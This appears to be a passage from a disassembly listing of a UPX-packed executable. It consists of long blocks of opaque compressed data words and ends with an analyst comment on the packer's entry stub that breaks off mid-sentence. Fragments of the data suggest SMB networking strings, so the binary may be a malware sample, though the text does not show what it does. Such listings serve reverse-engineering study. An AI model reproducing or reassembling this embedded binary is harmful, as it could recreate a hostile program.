0ABB81654h, 0A5F31D50h, 96FC8EEAh, 321C66h dd 61251C49h, 647BE6FCh, 973528E7h, 568C02h, 4F6C9019h dd 2F50B19Eh, 30587421h, 148D5515h, 0DD20A136h, 0EE7B388Ah dd 156B4490h, 84DC69CBh, 6160E26Fh, 4B0CA749h, 0DE036BB9h dd 2D2E1E1Dh, 0DF4A746Eh, 8A4DCFBFh, 1263250h, 0ADD249D9h dd 7822B981h, 684AD30Fh, 0E99A60Fh, 0A70F1639h, 0CC6972A8h dd 41F06D6Dh, 9C6D893Fh, 0AE0AC512h, 0EA0365Bh, 130D52FFh dd 12EB3C86h, 65F12FFFh, 8A377AD9h, 448A048Ch, 0C910064Eh dd 2C6FB7Ch, 150DAC3Dh, 14B9E87Ch, 0CE76CB2h, 0FDC66883h dd 0AB66AE06h, 2321BB1Ch, 49251827h, 0E9B09EBh, 0B9C3E472h dd 4780A71Fh, 1F41534h, 47239D7Bh, 15B40788h, 0F1D91B0Ah dd 0D824E1E4h, 661D8400h, 49210CF8h, 5B19DAECh, 81AC223Bh dd 5218364h, 0A155A612h, 55E0CC5Fh, 5B5F2FA2h, 0B9EC9042h dd 8214F444h, 450D0AC6h, 6F77E24Eh, 8EBE4A38h, 60C08C3Dh dd 0F60C254Ch, 44BE15A4h, 0CE46DF12h, 88B2812h, 7DFF854Ch dd 51E962D3h, 8A1AC7FBh, 2FD7FE5Ch, 1303ABF3h, 0BC263C47h dd 971BA4DEh, 0B8C42F89h, 97C12B0Ch, 0F7995F98h, 344DFF9h dd 448A781Bh, 0C338A514h, 4AE728CAh, 2C7BAC86h, 85891C28h dd 8A5FED7Dh, 90080CC3h, 7FFD5C00h, 102354D1h, 5D8A181Dh dd 74DB8400h, 17D4574Dh, 1496D6DBh, 149188D9h, 660B45F7h dd 0FFA3A0D7h, 5A8C0C64h, 7BBB6747h, 61FB80FBh, 7A040B7Ch dd 83AB067Fh, 410F61EEh, 906C7D1Fh, 7545415Ah, 691F88BFh dd 0B82843C3h, 0F707A947h, 8B649E21h, 2735F57h, 0DD2C4689h dd 5AAC3461h, 6A23048Fh, 0FC19BBF5h, 4E8D5027h, 44A75104h dd 5856890Ch, 46AC25Eh, 3F8EAF57h, 0E15C229Ah, 0C25BF330h dd 5C26992Ch, 0EE7F8142h, 0C1432BD5h, 1E489E1Eh, 33160B6Ch dd 1B375C67h, 6E0D66DCh, 5838D8BFh, 15607E90h, 6A125164h dd 7B419F0h, 568B048Eh, 1347035Ch, 667A16D8h, 0EFFE6216h dd 0CCD8B5ACh, 0D85C30E4h, 9B77B9A9h, 8F0D42A4h, 0C584F389h dd 0DAE7EA1Eh, 0CEC456DBh, 231B04C6h, 0E28C1062h, 23FDF6C4h dd 1B9D096Ah, 0C1572D1Ah, 80F86F13h, 6828E252h, 0D5F84CA4h dd 9B55B175h, 64158751h, 6E6D4C9Eh, 519E1F02h, 54AC6A5Bh dd 4E8C14CEh, 65228233h, 7F74AD91h, 98685723h, 0C37513Dh dd 9E4DEA77h, 6BA55254h, 0ED6B1CA1h, 499637BDh, 5052B61Eh dd 84D8DAD8h, 432CD50Eh, 2FBC01B6h, 
0C1841DF6h, 90E7BA52h dd 8B72A3A2h, 2EC2597Ch, 0B168008Ah, 50B358C7h, 57D55701h dd 79308D7Eh, 14529E46h, 0D8325044h, 0F24CC876h, 468D528Ch dd 0C984A725h, 80444Eh, 6E93901Eh, 85514E89h, 0CF85FF76h dd 2800D535h, 526E8954h, 0C2C95711h, 494F7C84h, 901D4E10h dd 56836C87h, 1C755251h, 0D498E018h, 0B9E5502Ah, 1FBC3BBAh dd 0C24CDBA5h, 0A227370Ch, 0AD62E02Bh, 239BA352h, 2375202Ch dd 83BF2C61h, 1ACB0190h, 68018E60h, 83BFA6BCh, 74C1AFC6h dd 8D98EE61h, 0CF83E570h, 486DED61h, 117E637Ah, 4906D4Ah dd 68F8C199h, 0FC563DB5h, 0F424BA8Dh, 5270E8DEh, 0A4E7B068h dd 937B70E7h, 0E3D77B67h, 98BD7843h, 0D86D84D1h, 292C8B4Bh dd 8DDF3D82h, 5697340Bh, 0C8685357h, 0D3494CF1h, 0B891DB30h dd 0CD73E52h, 1C86F081h, 0AB422014h, 142E0A11h, 9062142h dd 0E6BC6432h, 562C767Ah, 7C9C98C4h, 3FA7417h, 0A486422Ch dd 25BCF27Bh, 284D0451h, 236A706Ch, 205F3049h, 0ECB7484Ah dd 22B1AEFh, 0C842A75Ch, 454A0FEFh, 9EA5E9Eh, 837C8329h dd 83407E0h, 0B1BDCB70h, 0F1FE2C1Ah, 90D46857h, 6DD21C74h dd 24D91452h, 0C96325B2h, 5E893928h, 0BD64817Fh, 0EC5ED060h dd 0E068FF6Ah, 21FBDB36h, 0A1641B6Eh, 2589644Eh, 0FF348707h dd 4D308591h, 6589F178h, 0E87589F0h, 6E4723C7h, 0F4D845EEh dd 0ECDC0678h, 2DE4E4E0h, 0E0986F74h, 0EC4589DBh, 0FE13C76Bh dd 28FEE761h, 85893203h, 1CB809C4h, 0F0CB276Ch, 4D48A09Eh dd 0FCC11C8Dh, 46C9EDBDh, 2E741CDDh, 0B674FC41h, 0E7360D6Fh dd 420EC4Dh, 490C8D08h, 8C698902h, 891441FFh, 3B05E2C1h dd 0DB2676C2h, 0DB38A612h, 0CF51EC36h, 0DB1F42Bh, 0DE1D214h dd 5DE58B59h, 2C16C8A3h, 1875EE18h, 3335CE2Eh, 1D63030Fh dd 68106A56h, 24D8E16Ch, 0E4CE427Dh, 0CC187751h, 0B427B492h dd 83F88B1Fh, 9E481FE7h, 5D1A03E0h, 0FD0B8163h, 30BAD885h dd 0E141283h, 0F82B767Fh, 0C01C4375h, 0C44D8D02h, 0C77021BEh dd 8D2C6604h, 2A0AC455h, 45B763FFh, 992603EFh, 458DFFF7h dd 304E8DC4h, 0EF621970h, 0C415445Eh, 48114720h, 4D7DCD67h dd 0C08E03Bh, 1FE99DA1h, 40CB7C2h, 8BE85563h, 8FB8D742h dd 0C8D19423h, 17C3046Dh, 0E36F4FCBh, 5B2CCC90h, 7E355855h dd 14B42E21h, 8B96531Dh, 0DC0F48E8h, 0EA44609Eh, 0FD818CD6h dd 781D7E73h, 5D12AC06h, 6358082Ch, 
25E395A9h, 0FC9B8077h dd 0B0C74E78h, 80931003h, 0F9256610h, 7C5754D8h, 0D38A8814h dd 7F4BC916h, 9F68EC10h, 8D194D70h, 0DC25023Dh, 0EBC280EEh dd 0F005E272h, 0CA0306B2h, 0C748C5FEh, 69C80313h, 76AD882h dd 34200C6h, 7E6D49Ch, 58080E8Bh, 1C262C45h, 84584914h dd 54A0BB11h, 7810893Eh, 0E3099006h, 0FBEFC314h, 0F8DC6DB0h dd 0F601584h, 61D8C631h, 0ECD8D4EEh, 314198DFh, 4DAF0FD4h dd 4AC103D8h, 31A25069h, 39830632h, 3D623B32h, 865287B6h dd 0A54FA0A1h, 9AC604E9h, 45F684F5h, 0E78D5FE8h, 0C1AC0DC0h dd 59860EE0h, 68EA744Bh, 9EE02D3Ch, 0DCF8B52Dh, 15A54F42h dd 75A93B0Ch, 75EE8382h, 3A9F7510h, 0E8D52A1h, 0FD40E9F0h dd 0AEB2F8C9h, 5851E10Bh, 20F633CCh, 0B9BE1EC1h, 0B48B54F2h dd 9E4D0C68h, 0C64EA7D3h, 5079066h, 458752B4h, 9C7BB6B4h dd 1AE89A36h, 5250C10Ch, 0F62C7D54h, 32C00E4Dh, 0D2334369h dd 0F6200BB9h, 0F144F67Dh, 95148B21h, 0EE7E5289h, 0A1B7DDB0h dd 79820F16h, 0AA76EB16h, 0D643D46Dh, 0D52A66FDh, 23121C11h dd 0FD8313CDh, 0DC7C6D96h, 0DD7522C5h, 5AF20AFh, 1B039D9Fh dd 2278C281h, 2BD92B69h, 0E69C12D9h, 0AD0A3A50h, 0E6583230h dd 28D8D1Eh, 935B3085h, 0F9803480h, 4DA40E0Ch, 0F141614h dd 0F0A9FB0Ch, 828CD7A1h, 0F5301C68h, 0A7D1B065h, 1985D8F8h dd 6405EE0Fh, 0C329BE29h, 7C5F140Fh, 0BC402D02h, 4D1868D2h dd 5BCD6EAh, 6A8107E9h, 42ED806h, 4C565018h, 256724BEh dd 0E9365010h, 24545F3Ah, 0CD900B28h, 0B19014D0h, 1C9A0277h dd 0ECF6C87h, 5350014Ch, 216F0A3h, 578A45D2h, 0D80332DFh dd 2C296407h, 0F08B0C10h, 0C56C1351h, 3C56DD49h, 4E0C6EF4h dd 8B05FA10h, 575650BCh, 56AAA4Ah, 46810666h, 0C8E6C50h dd 49CC2B5Ch, 2683F18h, 68C6E8F7h, 0C04574A5h, 6553D89h dd 12917098h dd 0F70914CCh, 76CAEA07h, 0A31B45Bh, 0F668E0Fh, 205EAC5Ah dd 537C6AA1h, 0B49A11h, 0F627F966h, 6EA17A4Eh, 0FE2F6BFh dd 0D841F58h, 467C133Ch, 0D93A66B6h, 0C1D8562Ch, 28212CF7h dd 3780D7Fh, 8D522D39h, 0C51B1684h, 30502C9Eh, 5879C4C6h dd 784F08C7h, 0D5756C68h, 70857A5Ah, 3D35DC2Ah, 6C7D004Eh dd 0DB8FD5BFh, 2B8FBDDFh, 3D436005h, 927C0h, 38C55776h dd 8211054Eh, 68A04FB9h, 0EA0F3A68h, 0B50706CCh, 58464E94h dd 5B9B8C17h, 2752EAE8h, 0A34674E6h, 
0DC642E41h, 0B930141Dh dd 3805C701h, 19A07B0Fh, 0D40A3B3Ch, 0D9B78D10h, 30601926h dd 68A19CBBh, 0BC0923C0h, 681CEFBFh, 4D501C58h, 0DC2E66C6h dd 3F45964Ch, 0DE9A240Ch, 64A11849h, 6C0C0F44h, 0AA114D28h dd 27C90C0h, 3D87DD16h, 6B217C1Dh, 55365068h, 42FFF6A9h dd 0FFD65903h, 0A72F53Bh, 743A3E80h, 20094E0Ah, 73E606FCh dd 5E8DAEF6h, 96216A01h, 84FFFD3Fh, 8B2F74BEh, 4AD62BD7h dd 7D64FA83h, 50530025h, 0C67990C6h, 0F91E0784h, 0C0C24E38h dd 0A2687316h, 60E5211Bh, 0D2EC94A0h, 154C0268h, 0E13456CDh dd 52086004h, 96330084h, 70F1795Ch, 56C0356Bh, 83D710DEh dd 427F257Eh, 5CB56DA0h, 0C280DA0Ah, 1E148861h, 0F89635A0h dd 7CF73B46h, 0F83BACE8h, 0DDC03176h, 0B0CC11Ah, 0DF0A003Ah dd 0B770ADA2h, 11B94254h, 417C252Dh, 3D78251Dh, 64F99618h dd 0EF70A6BAh, 46017F2Ah, 2874145Ch, 0ECDC097h, 44405299h dd 59D3DEDAh, 3D3DC84Dh, 42F0E69Eh, 44D41EEBh, 65C60605h dd 8E3A891Fh, 0AFC354ECh, 0B514620Ch, 0E37FBB0h, 1775D609h dd 74303F80h, 1118161Ch, 8F685BB4h, 408B078Bh, 1F31084Fh dd 58890575h, 9B401C09h, 0D93C0FB1h, 6A3467E2h, 0CA75031h dd 0DDC30C75h, 10DC5B22h, 0B5C3346Bh, 0A3B41A1Dh, 0B8B547DEh dd 0E103D27Fh, 8B17FDBDh, 8B025050h, 6D3F0A00h, 51B151D2h dd 3FCBF4Dh, 0B010490Fh, 0A15F2159h, 26B4F6Ch, 64B540D7h dd 3A086405h, 0B059C2A6h, 0D06B5651h, 941613F3h, 4FB891A7h dd 2E72700Eh, 56C8D121h, 0A5D31556h, 0FA0EA593h, 0E2830CFh dd 7BC06813h, 41EC0034h, 7D420CB2h, 35C642Bh, 2611AA01h dd 418048CDh, 77C7DE75h, 6A54A656h, 0A32B6865h, 1BD780A7h dd 0A0D33A9h, 0D76EA3E1h, 0B8A35BDBh, 285051CEh, 8F7AAA6Ch dd 20AAC377h, 5E221589h, 0B9640E1Ch, 3DF09824h, 0A7A8640Ch dd 100C7181h, 0F18C38A5h, 760BAB4Ch, 77FE0105h, 1F87B65Fh dd 94A3C084h, 33E87452h, 84CC8AC9h, 9AE074C9h, 60168965h dd 560CB2D7h, 0A168931Ah, 0DCA9C91h, 0CCA1AC56h, 953D9912h dd 7FB15320h, 5AC09030h, 0A06850D7h, 48E0CA2Ch, 0FC1AD368h dd 0AFE3EB6Bh, 3CDB9290h, 542A031Ch, 3C7698A3h, 6E878318h dd 889604C4h, 37EE58B0h, 72157027h, 1BDEF7F0h, 198068F6h dd 6B6A90B6h, 785C1B08h, 3DC8B98Dh, 45C60D6h, 5217C68h dd 0BB2E49C2h, 0A786886h, 3870A370h, 303CC139h, 
8AB72F7Ch dd 5DA9B6C0h, 4C05D487h, 80583C25h, 7B84C02Fh, 1D4C0814h dd 7641767Eh, 1BD69763h, 0F00B2590h, 0C97B0F2Ch, 0A015E04Bh dd 183D3F32h, 2363BF58h, 13888620h, 0FF3EB43h, 48F4B15Eh dd 1FFE6394h, 2D14FFD0h, 2074DC8Bh, 3C32048Ah, 0ADB060Ah dd 0D3C66BDh, 0A6A75h, 0A124421Eh, 3B1DC7D3h, 5AE072D1h dd 8A164DEFh, 0D248522Ch, 0A101A0F8h, 0F845CF0Bh, 581725CDh dd 7989EFEAh, 0C8834805h, 3B440FCh, 1CB84594h, 6C009EC4h dd 5357B87Dh, 0FFF8F8ACh, 50F92B59h, 0F78BD18Bh, 17274BFh dd 0A9457891h, 26ACA79h, 0B1906C45h, 66C350BDh, 66F87566h dd 0A2E816h, 8B90D4Fh, 1D1B7125h, 0C411B76Ah, 8BEA0966h dd 8B1A8030h, 30693D67h, 755F0D20h, 895D275Eh, 8A538EB3h dd 760E341Ah, 5BB091E8h, 41B45A1Bh, 0A344CB84h, 0DB95C6A6h dd 1DB4B524h, 891A33FBh, 0A155194Dh, 0D8E43C5Dh, 0E6745251h dd 37B88572h, 0A0F17D60h, 44489C68h, 7A15FD4Ch, 0EBC253D2h dd 0C61F51ACh, 76390584h, 0DC06E03Fh, 0BFFA3C1Fh, 0C2E11890h dd 4FFF27Bh, 21F958Dh, 508FA8Bh, 69503B61h, 2C074FFFh dd 1A9A2442h, 641F2181h, 345EC8B7h, 4D8C2D2Eh, 0A3408D8Ah dd 0B132BDB1h, 0E004D9DEh, 0ABCD51D1h, 0C86C1854h, 8BD41388h dd 90B02C80h, 4E20FA36h, 0ED8A1F5Eh, 0BB428CEh, 0B88B8FEh dd 0A8D1DB32h, 3096187Dh, 0AC0E5C38h, 5B007BB7h, 17E91358h dd 1BFBDC06h, 8103073Fh, 0D1030190h, 0CFEA252h, 0C3C2E09Ah dd 0C7725780h, 0ACEF59D8h, 6F847016h, 0A44708D2h, 0F839A439h dd 0BF8FCFCh, 57367AB6h, 70148C1Ch, 8F60C8E2h, 4588680Dh dd 0FDFF07FDh, 0FE320DF6h, 0D71C30FCh, 74F03BFCh, 0D3EC30D4h dd 6824B487h, 56D3B19Ch, 5AC061ADh, 5617D7DAh, 7623185h dd 29ED021Dh, 0D7C8D73Bh, 0A7A88CEBh, 0C82C59ABh, 838A539Ch dd 1C84B3E0h, 0F07E1388h, 0FD12A166h, 500978ACh, 0A366CE91h dd 0FEE16122h, 0F181F760h, 0FE8100AAh, 240D899Dh, 2F72F611h dd 0BE85B6ACh, 13136150h, 3F68911h, 6AEE754Eh, 0C00F61FFh dd 2F601E95h, 33AB3F68h, 3ACE8F7Ch, 1B940C4Ah, 2C5023C2h dd 9F00B90Eh, 48141010h, 380E723Ch, 5142951h, 0ED74839h dd 514820C8h, 462F5052h, 5290313Ah, 1C033E59h, 62148914h dd 62D9C44Bh, 4052A0F1h, 0EF082BA9h, 123BECD4h, 0A3645053h dd 22F6C936h, 0BC116401h, 9162C159h, 7A57BFB2h, 7BECE46Ah dd 
7E005201h, 0C01EC306h, 6BDB187Bh, 0C9DF99B0h, 0A6162159h dd 514F1104h, 60365BA2h, 79F0C37Ah, 6DEEA9C3h, 7870CF9Ch dd 0C95C35D1h, 0E6AB0403h, 32AD6344h, 0E82C17h, 0EBAF56D8h dd 37059AB3h, 9305C02Fh, 0B9588ECCh, 0A9B2A957h, 58CCE4DDh dd 0DB184075h, 0B6E72E50h, 0BA423BA0h, 4A8406D6h, 0D4182A1Eh dd 4C94D9B9h, 0D2D4F36h, 5040604Fh, 3FD41CB4h, 0A26CB2A4h dd 80B0047Bh, 70EC23B3h, 3748283Eh, 16883514h, 0D228C50h dd 0CCBBB4ABh, 3436241Bh, 0FC37865h, 0DF773DCh, 3FD3378Bh dd 2316CDD5h, 1BA99B64h, 0D0715116h, 64BDC1A0h, 756C23A0h dd 9AFB311Dh, 0D3A856A3h, 0F404E4B5h, 0C8E59Dh, 0C0179009h dd 0F574D46Bh, 72C71C24h, 3BD078CEh, 7DAD60F8h, 0EC01674Ah dd 14A329E6h, 75664452h, 0B216720Dh, 18B1A3Ah, 52C1902Ch dd 760C5DB2h, 421E1408h, 6ADFAF56h, 1063D99Ah, 443E366Ah dd 0D4D21FE8h, 801D0B69h, 0AE404F5Ah, 0FF53C5F9h, 250CE025h dd 0DF00CCDCh, 51DEA7F7h, 720A4A3Dh, 0BE98114h, 6E85042Dh dd 1B1C15Bh, 68EC7317h, 0E18B0CC4h, 8EFB646Ch, 500440ACh dd 0D83FCCC3h, 3C4745D4h, 0D06761h, 903708B8h, 0ECC122EFh dd 9B0FC826h, 0B8EC0D10h, 3E3F0960h, 5201A60h, 28BF1993h dd 0E6650E37h, 738DCC0h, 2107FF00h, 0B2DEF9h, 4A502F2Bh dd 7ED7BEh, 57132459h, 0AC0801Fh, 0F057D931h, 0F17400EDh dd 2060A88h, 0BFFF24CBh, 5352BF9Dh, 8003141h, 6711F501h dd 6D80B482h, 493FBC44h, 0FFFF233Bh, 9747FFFFh, 10B644BCh dd 46041DE7h, 519A52BBh, 6FCE6CD4h, 0CACF3F4Dh, 0DAB6AA47h dd 85B84617h, 0FFFF0CE9h, 5055FFFFh, 0D725C687h, 56274C62h dd 0C66068B7h, 54E02C5h, 435BBA56h, 3965E65Ch, 0DD7A2D4h dd 0FFFF90B1h, 0D377FFFFh, 99091ADh, 9683CAC8h, 0A2D0C038h dd 132714DDh, 0C8E8D428h dd 4716DAC3h, 6237CDDEh, 0FFFFE23Ah, 1650FFFFh, 62EE766Ch dd 0C8FCB386h, 0E03A95B8h, 0DF06B735h, 42653CDh, 0AF2C3CB4h dd 0D55D6323h, 0D12F052Ah, 0D89FFFFFh, 0AA1D6687h, 34051686h dd 1390A740h, 8D10151Fh, 6CA265DCh, 0FFFFFFFFh, 0D4709EC3h dd 3CAF03B0h, 8CD05411h, 6EC05DEEh, 6ED7652Bh, 87A772ACh dd 0DEB851FAh, 4A3474E2h, 0FFF42FFFh, 6A1D25E3h, 0E9A35A70h dd 0E789EF64h, 18FC0E9Ch, 1C20F3A6h, 4DB04DC4h, 0FFFFFFFFh dd 0ABB374B2h, 2980D04h, 0E9A6EF18h, 0F74ED25Eh, 
6CD77308h dd 0F54BD948h, 0C476D37Ch, 87DD1356h, 0FD087FFFh, 6F63E9DCh dd 0EB8F746Eh, 0D5341227h, 5DABAAAAh, 0B966C933h, 0FFEDB7E0h dd 758D021Fh, 8AFE8B05h, 7993C06h, 302C0646h, 0FF993446h dd 0D3A5FD0Dh, 0AEBEDE2h, 2EC9DAE8h, 2E676562h, 0C9999371h dd 7FEDFFFEh, 0BDFD1201h, 716FD91h, 0AA6872C1h, 0AA66FD42h dd 14BA10FDh, 1F98FF1Ch, 1AFF75BBh, 0F198F3C9h, 71028608h dd 5F901013h, 0B7DA37CBh, 5992FB1Dh, 0DB91C96h, 9B037518h dd 0C125CD08h, 10F6C8FEh, 0ECE4DC25h, 5D185447h, 0EC7FB11Bh dd 449FF3DBh, 0A9719BF3h, 0E368F319h, 0E71C1065h, 0EFED6F0Bh dd 0D9751AFEh, 0BD9D5EFFh, 0DC12FF24h, 0DD10FF4Dh, 0AC4F070Ah dd 0BB7FEC33h, 9D0B0073h, 3296E514h, 0F3451232h, 2C66CA89h dd 7FDF6731h, 0B16B71F6h, 74416713h, 88D95D1Ah, 0BAF31134h dd 9DDB7DEEh, 98904F1h, 0F32D04F1h, 66CB612Eh, 0F3674FDBh dd 0EF74F0E3h, 0FDB62180h, 56C9B264h, 0C0E86F2Ah, 169B2097h dd 4C9FF75Eh, 0E5C1D838h, 0C959B2D5h, 0F93BC919h, 1FF63D9h dd 0F40414D9h, 3571CA23h, 61688D63h, 7FEEDA91h, 1AC3F064h dd 0A7ED6661h, 6C5D12CDh, 7F4ECBC9h, 79CDB272h, 5A1DF056h dd 0C096A648h, 64C9FECBh, 294CED14h, 9CF3EBA7h, 0F7C9FE5Dh dd 0F434FB93h, 0CED07126h, 0EF133BF9h, 0F908ABECh, 10BCDFFh dd 0F6FEC5B7h, 0FCE1FCB7h, 0E6FFC999h, 0F5CAFEDFh, 3AE9FCFCh dd 0F7EBFCF2h, 0C7AAF5FCh, 59AAF934h, 0FC2A2DB4h, 66FFFFC9h dd 0E6ACC91Eh, 0C9A5B7E7h, 9DB8BD9Ch, 71CDC982h, 3519BF92h dd 183F1451h, 95186FBBh, 2A91720Ah, 0D22AC871h, 80D512A5h dd 0FFFEDFF6h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh dd 0AB9E5958h, 0A319DB9Bh, 7FFF6F20h, 3A6CECE9h, 9EED85BDh dd 81E8A2DFh, 125544EBh, 961FBDC8h, 42C28D2Eh, 12EBFFF3h dd 5A9A85D8h, 9A099D12h, 29F8105Ah, 0DBDB13E3h, 66497FEEh dd 12FEFD7Fh, 0C25AA987h, 12850295h, 57910482h, 5AB78C7Fh dd 0B7FDF7CBh, 53FF85D6h, 9172424Dh, 0F243BFFFh, 0FEC85318h dd 621700h, 20435002h, 5754454Eh, 0FFFE5F6Bh, 204B524Fh dd 474F5250h, 204D4152h, 4C302E31h, 24D4E41h, 0FFB7F60Ah dd 6E69571Fh, 73776F64h, 726F6620h, 6B035720h, 756F7267h dd 0FB0E0E70h, 2E33FBADh, 4D276131h, 30583223h, 32323230h dd 0D6FF2D83h, 544E0A16h, 204D4C20h, 
0A4703230h, 7C8C9580h dd 0B107738Bh, 0F65DBEC1h, 23FF0Ch, 140A1104h, 0ADF00520h dd 53D4805Dh, 4B4C0069h, 505353h, 0DE48F6Fh, 8829762h dd 240057E0h, 7B64006Eh, 0FDCDB1h, 77006Fh, 30743A73h dd 738C0901h, 397B225Bh, 1D233500h, 3C00072Eh, 0DA01B227h dd 0DA2008ABh, 80C9324Eh, 39F57h, 4EC1B06h, 47234666h dd 1B9F4007h, 64079h, 1F011006h, 0A37FFF15h, 0E0888AFEh dd 4F0048h, 6A198101h, 49E4F27Ah, 30AF281Ch, 0C8107425h dd 67D81137h, 0DF5CE153h, 0CB075C75h, 4003053h, 5A01275Ch dd 0EBDD7723h, 4D615C08h, 36072Eh, 0D8392E38h, 30776376h dd 0EC00491Bh, 0E7905C43h, 3F00B3B0h, 0F2A26463h, 80F96DFh dd 164004DCh, 0DEDE00FFh, 16000E00h, 0F612130h, 2602019Fh dd 0F7DC3440h, 319289Bh, 0D96C8B11h, 65DF2174h, 70D36Fh dd 6B9C2A63h, 6D9EC025h, 0E109F4Bh, 6E1B0448h, 54EEBAEBh dd 265A5413h, 5C225963h, 0CFF9A4C7h, 6545CB7Dh, 0B000587h dd 4F481003h, 0B81DA0BAh, 1110110h, 8FFC286Ah, 3919FFFDh dd 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh, 8A885D5Fh, 11C91CEBh dd 0F645E89Fh, 2B3C2FB2h, 0D1604810h, 87A3F40Ch, 60CF92BCh dd 0CA00CA0h, 64727B1h, 0A0000C90h, 24F0880Ch, 407FDFh dd 3EC0009h, 14950007h, 0BDEC840h, 707C4F8Eh, 0FF0700F7h dd 43A5EC88h, 13857813h, 0C85BAB00h, 911284F3h, 2FF81013h dd 139E3188h, 230EFEFFh, 860E9340h, 84084241h, 27934388h dd 10B9EE9Fh, 0B801FFEEh, 90200C10h, 0ADC9B30Fh, 0F7F070Dh dd 2CF92BD8h, 700118AFh, 80370F84h, 0F84C87Ch, 2000F95h dd 0F26C3C7Fh, 6C0F84E4h, 0A89A000Fh, 2556F644h, 9513436Fh dd 2360427Fh, 50586E69h, 79725020h, 840DB6h, 3B014A46h dd 92796B32h, 123C0A1Fh, 41027515h, 0F6450053h, 9E1C089Ah dd 563FD701h, 0E806EB39h, 5C73255Ch, 9D637069h, 0FF5B5CECh dd 1CEC8166h, 0B3E4FF07h, 0FC037B4Ch, 4D34D34Bh, 0A8C8E4B3h dd 0DFFA6C88h, 445C4D34h, 63726938h, 72616B2Eh, 4B656E2Eh dd 2A37FF74h, 70736167h, 2E65646Fh, 2E0D617Ah, 37BE6705h dd 630973FBh, 1361696Ch, 0EC6F0F25h, 2C26FED6h, 6B752E6Eh dd 575652Eh, 2F72650Bh, 175B0BBBh, 6843771Bh, 1F74670Eh dd 0E5ED6364h, 752EE48Fh, 736F6C73h, 6C65612Dh, 0DB681A65h dd 6163D95Eh, 12726220h, 76731D73h, 81E652DBh, 55652F5Dh dd 9F177266h, 6653DEC0h, 
330E616Ch, 7A617267h, 0E4A6D52Dh dd 6D74612Eh, 0DD771E87h, 8ABEE87Eh, 6B6F7664h, 618C721Eh dd 66216362h, 0EDFE0D67h, 6B6ABFBFh, 6F6E6D6Ch, 74527170h dd 78777675h, 4BFD7A79h, 41FFE5C4h, 45444342h, 49484746h dd 4F4E4B4Ah, 5B015376h, 6F548094h, 0FDBB5AD9h, 53772F85h dd 86205245h, 2A203820h, 0D073A20h, 5C5A4B0Ah, 726CFB62h dd 2C795C65h, 7B754349h, 13C18DB2h, 0B532250h, 0A474E4Fh dd 374AFC1Bh, 3407490Bh, 3F4A6F35h, 4FB587E4h, 55512F0Ch dd 6F795449h, 0ED6D0021h, 6F63F9BCh, 68216C6Fh, 0A8656865h dd 7B1B296Eh, 523FFC4Bh, 47915649h, 23712D82h, 0B914FF0Bh dd 0C578652Eh, 697A6F4Dh, 0C22F236Ch, 348B76EDh, 442820E9h dd 69F0706Dh, 6E438062h, 203BEDF1h, 20454934h, 203BFF36h dd 1745AE7Bh, 54D135D4h, 57663F87h, 6425FBA3h, 2735022Ch dd 85312DF3h, 773F0BBh, 4B747558h, 3307356Dh, 0FDDC2D9Ch dd 67303172h, 482D716Fh, 0FBC2DB0h, 162099DBh, 4084449h dd 85FE9758h, 530006DEh, 4185464Fh, 4D5C4552h, 73686369h dd 1F0AAD6Fh, 5C7466ECh, 75435C77h, 0A4AD2F72h, 56868DC2h dd 5C3A69C5h, 0C357AB52h, 55FF210Dh, 74616470h, 6F415365h dd 5AC263EDh, 5A724F37h, 732A1B73h, 76496DADh, 0B22302h dd 26841C6h, 560147C4h, 4B1B6401h, 467DB4A5h, 4A0C6507h dd 41C6EA8Dh, 0C4636FFDh, 6EDFF3CEh, 69FDEDB4h, 6F430A41h dd 69467970h, 756F656Ch, 45650E8Dh, 4E471EB9h, 0DD646F4Dh dd 75F33DEDh, 1A48656Ch, 6D6D2811h, 86B04C0Eh, 10246BE3h dd 388E5C44h, 699B4DB0h, 4D0CE143h, 3D417809h, 17F60BFBh dd 6D614E1Dh, 69530D3Fh, 0DD338B7Ah, 0F52AB9Eh, 6E49090Dh dd 8E60913Ch, 656BBB6Dh, 45630A64h, 0DE9DF96Dh, 95B59ED6h dd 1D695436h, 0D617757Ah dd 0DEDBF2Eh, 451B614Ch, 726F7272h, 300A7953h, 0B5BBDEC5h dd 6F54331Eh, 523094Dh, 1896E033h, 36C56599h, 0DFDB361Bh dd 0B1B26972h, 24E96FBEh, 0E76E1DD3h, 3F448053h, 0B6BD92C0h dd 86687463h, 5EC71454h, 4D2AC2B7h, 36DB6854h, 0B6067645h dd 63BB7B65h, 53204661h, 730D86F9h, 624F5B6Fh, 2C6D2E6Ah dd 0CD8B05ACh, 297C2F0Dh, 0B05AC17Bh, 7065065Bh, 3061208Dh dd 87135384h, 93B2C563h, 6D92C185h, 0D1F74118h, 0F09F9DCh dd 4B896757h, 10457965h, 0E85D876Bh, 75F65699h, 0A510F65h dd 4ED602BDh, 704F1158h, 0CC3B307Dh, 
21D81362h, 0E1514210h
                dd 0CDBB420h, 8D86241h, 70EC6853h, 0AE5758F6h, 70798E6Eh
                dd 0D9487774h, 0F27305F6h, 12440A10h, 76DA0E61h, 69CEAFE1h
                dd 67157966h, 2B75136Eh, 0C36BB7B0h, 6FD56C36h, 0B1112C79h
                dd 6FB7B3B9h, 1E8F5210h, 0B60FE465h, 782A02A3h, 63411474h
                dd 72697571h, 361C2B9Ch, 0A01E494Dh, 69FE943Ah, 0D0DE1316h
                dd 78435F5Fh, 739C0278h, 58570CCh, 7B026038h, 7C73DCDh
                dd 19726863h, 6B380506h, 0E9669C0Bh, 0B2708AE8h, 0CD38F15Eh
                dd 13416676h, 2CAEF0F4h, 3738785Bh, 41B55532h, 2C160211h
                dd 2023D264h, 91C70DC3h, 0E6E6E40h, 2B7453EAh, 2131076Dh
                dd 73FFA4B9h, 59659602h, 6F390896h, 5912340Bh, 0C596596h
                dd 2091704h, 65965965h, 316010Dh, 0EA2D8010h, 50F21384h
                dd 3E5F4C50h, 0DA4B5F32h, 0FF40AD17h, 10B01E0h, 0CECEC306h
                dd 132E7652h, 465B0B30h, 40256367h, 7FF020Bh, 37B2DCCEh
                dd 341E0C50h, 0DEB2F210h, 0C40607C0h, 600E3788h, 7C8CC840h
                dd 0B0AE1DDBh, 0F62E1E01h, 902D8607h, 6A48C17h, 0C854CC2Eh
                dd 46851EDh, 0FB8279E0h, 0B75F0FA4h, 322B2FB0h, 4C01627h
                dd 5E000064h, 43433980h, 90000h, 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
; start -- packer entry stub (the program entry point named by `end start`).
;
; The instruction sequence is consistent with the stock UPX NRV2B
; decompression stub. In order, it:
